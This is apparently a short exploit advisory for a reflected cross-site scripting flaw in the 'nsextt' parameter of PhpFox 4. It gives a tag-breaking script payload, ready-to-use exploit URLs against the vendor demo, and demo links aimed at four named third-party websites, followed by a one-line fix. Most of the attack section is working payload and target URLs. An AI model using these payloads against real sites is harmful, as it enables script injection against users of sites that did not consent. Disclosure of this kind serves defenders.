###########################################
# Title : PhpFox4 Cross Site Scripting Vuln.
# Author : bl4ck_MohajeM ( mohajem.war@gmail.com)
# Software Link: http://www.phpfox.com/
# Version: 4
# Date : 06/09/2016
# Category: WebApps
# Tested with : Ubuntu / Win
###########################################
[Description]

In this Cms theres is a Cross Site Scripting Vurlnerablities in
'nsextt' Parameter .
PhpFox Get the value of this parameter from the Client without any php
function Ani-XSS Function.
Vuln. Input ==> /?nsextt=

###########################################
[Proof of Concept]

Add this Instead of '/?nsextt='
/?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
Then you wanna see the alert that cotain '209'

###########################################
[Example]

https://v4.phpfox.com/v/category/69/comedy/?nsextt=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x0000D1)%3C/scRipt%3E
https://v4.phpfox.com/blog/
https://v4.phpfox.com/photo/
https://v4.phpfox.com/forum/
https://v4.phpfox.com/poll/
https://v4.phpfox.com/quiz/
https://v4.phpfox.com/event/
https://v4.phpfox.com/music/
https://v4.phpfox.com/marketplace/
https://v4.phpfox.com/pages/
https://v4.phpfox.com/invite/





demo :
tabrizcloob.ir/forum//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
alachikh.ir/poll//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
facebook2.ir/event//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
avs.ir/music//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>


###########################################
[Solution]

Programmer should encode those data we gain from Clients .
###########################################
tnx : sha4yan -  arf1372 - Milad Hacking - n1arash  - Und3rgrounD -
shabgard - b3hz4d

###########################################